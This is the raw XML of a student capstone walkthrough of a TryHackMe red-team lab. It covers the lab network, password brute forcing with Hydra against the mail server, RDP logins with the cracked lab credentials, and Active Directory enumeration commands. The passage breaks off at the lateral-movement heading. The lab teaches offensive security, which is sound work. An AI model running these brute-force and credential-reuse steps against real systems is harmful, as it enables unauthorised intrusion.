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5BC8" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>RED TEAM CAPSTONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505DD4C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="D5E8F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Complete Attack Chain Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D079E0C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A9C4D9"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="A9C4D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> | DEPI Graduation Project | May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284732DD" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E770F8B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Attacker: Hollow | Team: Ayman Azzam, Amr Adel, Ibram Nagy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489C175F" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Instructor: Ahmad Ashraf | Duration: 7 Days | Flags: 20/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739631E" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9C33F0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0. Environment Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06816751" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D653BD5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Network Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB53711" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The target was a multi-domain Active Directory forest with three tiers across three domains, connected via bidirectional intra-forest trusts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E551B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11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B11CB" w14:paraId="4A267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9CAF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Forest Root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E867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thereserve.loc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="1DD70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1B09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Corp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FB5D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corp.thereserve.loc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="2F8F9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A6B2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Bank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F3E7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bank.thereserve.loc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="18303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F359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Trust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6F15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Bidirectional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IntraForest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="2EC37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EE3C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Attacker tun0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198F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12.100.1.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="6E719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5ED9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Attacker capstone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5ADD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10.150.40.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1653E4EF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8261E4" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Machine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400"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B11CB" w14:paraId="19AD4B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24317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Hostname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4AC56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43710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0FCB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7B451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7B11CB" w14:paraId="3427EE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A4E2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ROOTDC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2AF8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6720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1A5C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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E5D5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Forest Root DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="6E0C0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EC26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CORPDC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79C5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10.200.40.102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6018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corp.thereserve.loc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5747" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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2179" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Corp DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="51EC9C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4D2A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BANKDC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3EC4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10.200.40.101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BE5E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bank.thereserve.loc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FBD5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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F291" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Bank DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="7BB742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8B3F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Server1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DC3C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B672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corp.thereserve.loc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2CA7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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B219" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Corp Server (pivot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="3870F2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8AD4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Server2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C774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57DB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corp.thereserve.loc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0E33" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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A9B9" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Corp Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="2F2E49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FF9A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WRK1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8E62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44D5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corp.thereserve.loc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6356" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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D0C7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="0B29F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DE7D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WRK2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25AB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5FD2A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corp.thereserve.loc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31C3" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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E931" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="55DBBD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2AAE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WebMail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33A0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2F81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5269" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DMZ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8239" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mail/SMTP Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="16E582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FDC4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2830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8711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-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518B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>DMZ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2E71" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OctoberCMS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Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="757685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FB83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JMP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D7FD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10.200.40.61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C115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bank.thereserve.loc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F0A3" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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64EB" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Jump Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="4FC0A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4353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lastRenderedPageBreak/>
              <w:t>WORK1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ADE2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10.200.40.51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6BB4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bank.thereserve.loc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9F7F" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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B370" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Bank Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="300B19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7C10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WORK2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3B9E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10.200.40.52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F303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bank.thereserve.loc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B965" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier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228C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Bank Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="2C671C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1E86" w14:textId="77777777" w:rsidR="007B11C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SWIFT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CAB4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10.200.40.201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34EE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bank.thereserve.loc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6AA0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="40404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3FA2" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SWIFT Web App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ACE2365" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21308501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0 — VPN Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B2A63" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73460C8D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Before any attack could begin, a connection to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN was established to route traffic into the target network segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615C6F56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Connect to THM VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322828A9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openvpn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--config depiteamone923-redteamcapstone_v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2.ovpn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="49AC9CE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E0B5A7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connection — two interfaces appear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149BB68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capstone: 10.150.40.5/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24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lab VPN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B5D3E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tun0:     12.100.1.9/24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THM VPN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DFDC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84CDCF5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Target network reachable at: 10.200.40.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C588E7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20220752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1 — Initial Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547FA2DD" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F97DC77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1.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>OctoberCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery (10.200.40.13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF19573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A web application running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>OctoberCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> was discovered on 10.200.40.13. The login page was found at the standard backend path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF3CE9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OctoberCMS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login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0923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http://10.200.40.13/october/index.php/backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785D3B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4190DB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Testing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admin:admin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revealed a critical error message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403022B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"A user was found to match all plain text credentials however</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF816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 hashed credential password did not match."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1504CAA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3DF27E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This confirmed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530AD4C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  1. Username "admin" exists (username enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192E7D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  2.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OctoberCMS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uses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hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD4C00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BD7AABB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Brute force with Burp Suite Intruder triggered account lockout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD87C5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  NOTE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OctoberCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> error messages expose valid usernames — a username enumeration vulnerability. Account lockout was triggered during brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E877A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0570375A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1.2 Webmail Brute Force (10.200.40.11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D083DFB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The webmail/SMTP service on 10.200.40.11 was targeted with Hydra using a list of known service account naming patterns for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>corp.thereserve.loc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E8833" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Username list created:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FBC0F9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Administrator@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A27165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svcBackups@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589179B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svcEDR@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF69D4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svcMonitor@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD3B3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svcOctober@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D54ED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svcScanning@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3EB89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lynda.gordon@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B756F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keith.allen@corp.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614E662" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Hydra brute force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD72D3F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Brute force SMTP service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEF963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hydra -L userlist.txt -P passwords.txt smtp://10.200.40.11 -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41637F8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1FF79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Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A59B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keith.allen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Password123!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501612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lynda.gordon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thereserve2023!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8150A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Password1!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C099C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68196B81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2 — Initial Foothold on WRK2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E18CB" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1349F0ED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2.1 RDP Access to WRK2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC6B06" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Using the credentials obtained from webmail brute force, an RDP session was established to WRK2 — the first interactive foothold inside the corporate network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F927E1F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RDP into WRK2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD6D43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xfreerdp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/v:10.200.40.22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u:keith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.allen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/p:'Password123!'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cert:ignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="525582D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OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A958E" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E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xfreerdp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/v:10.200.40.22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u:lynda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.gordon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/p:'thereserve2023!'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cert:ignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20983BAF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B366CEA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2.2 Domain Enumeration from WRK2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCF34C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Once inside WRK2, basic Active Directory enumeration was performed to map the domain structure, users, and groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E7D7B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Basic enumeration commands run on WRK2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0AD79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/all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3BFA5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user /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF86F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group /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA784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group "Domain Admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014B92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group "Tier 1 Admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610991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group "Server Admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CEB5F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ipconfig /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76289D8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F31009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Key findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1718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Domain: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corp.thereserve.loc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A9C665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DC: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CORPDC.corp.thereserve.loc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(10.200.40.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0ED07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Tier 0 admins: t0_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heather.powell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t0_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josh.sutton</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C60AD11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Service accounts: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svcEDR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svcMonitor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svcOctober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</w:p>
    <w:p w14:paraId="43DC295C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702B937F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2.3 Network Script Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6709D" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>PowerShell setup scripts found on WRK2 revealed internal network topology and backup paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB0C15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Read network setup script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B3B5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cat C:\thm-network-setup.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCFB3C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Revealed: DC at 10.200.40.100,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WebVPN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at 10.200.40.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F831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BC43DD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Read sync/backup script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284C44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cat C:\SYNC\sync.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A69F46F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Revealed backup path: \\s3.corp.thereserve.loc\backups\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD34C12" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1A3138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3 — Lateral Movement to Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF13A7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
